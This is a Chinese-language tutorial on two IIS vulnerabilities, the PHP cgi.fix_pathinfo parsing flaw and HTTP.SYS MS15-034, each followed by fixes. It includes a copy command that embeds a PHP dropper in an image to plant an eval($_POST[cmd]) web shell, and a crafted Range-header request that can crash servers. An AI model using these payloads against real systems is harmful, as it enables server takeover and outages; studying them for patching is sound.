中間件漏洞篇 03 iis7 文件解析漏洞 HTTP.SYS遠程代碼執行漏洞
IIS7&7.5解析漏洞
漏洞成因:
當安裝完成后, php.ini里默認cgi.fix_pathinfo=1,對其進行訪問的時候,在URL路徑后添加.php后綴名會當做php文件進行解析,漏洞由此產生
2.復現
復現是有兩點需要注意
1.cgi.fix_pathinfo的值為1
當cgi.fix_pathinfo的值為1時,php會對文件路徑進行修理
2.添加程序映射的時候,請求限制中的這個選項需要取消勾選
常用利用方法:將一張圖和一個寫入后門代碼的文本文件合並將惡意文本寫入圖片的二進制代碼之后,避免破壞圖片文件頭和尾
e.g. copy xx.jpg/b + yy.txt/a xy.jpg
######################################
/b 即二進制[binary]模式
/a 即ascii模式 xx.jpg正常圖片文件
yy.txt 內容 <?PHPfputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
意思為寫入一個內容為 <?php eval($_POST[cmd])?> 名稱為shell.php的文件
######################################
找個地方上傳 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可執行惡意文本。
然后就在圖片目錄下生成一句話木馬 shell.php 密碼 cmd
3.修復
1.配置 cgi fix_pathinfo(php inil中)為0並重啟php-cgi程序
2.編輯映射模塊->映射->打勾
HTTP.SYS遠程代碼執行(MS15-034)
1.介紹
HTTP.SYS是Microsoft Windows處理HTTP請求的內核驅動程序,為了優化IIS服務器性能,從IIS6.0引
入,IIS服務進程依賴HTTP.SYS
HTTP.SYS遠程代碼執行漏洞實質是HTTP.SYS的整數溢出漏洞,當攻擊者向受影響的Windows系統發送
特殊設計的HTTP 請求,HTTP.sys 未正確分析時就會導致此漏洞,成功利用此漏洞的攻擊者可以在系統
帳戶的上下文中執行任意代碼。
主要存在Windows+IIS的環境下,任何安裝了微軟IIS 6.0以上的Windows Server 2008 R2/Server
2012/Server 2012 R2以及Windows 7/8/8.1操作系統都受到這個漏洞的影響驗證這個漏洞
2.影響范圍
Windows7、Windows server 2008 R2、Windows8、Windows server2012、Windows8.1和
Windows server 2012 R2
3.影響版本
IIS7.5、IIS8.0、IIS8.5
4.復現
訪問網站
編輯請求頭,增加
Range: bytes=0-18446744073709551615
字段,若返回碼狀態為416 Requested
Range Not Satisfiable,則存在HTTP.SYS遠程代碼執行漏洞。
GET / HTTP/1.1
Host: 目標IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
Connection: close
Range: bytes=0-18446744073709551615
Content-Length: 2
poc 地址 https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC
使用IIS作為WEB容器且使用版本存在編號為MS-15034的遠程代碼執行漏洞。利用該漏洞可輕易使服務器宕機藍屏。發送測試代碼,若返回“Requested Range Not Satisfiable”證明存在此漏洞
5.漏洞修復
安裝修復補丁(KB3042553)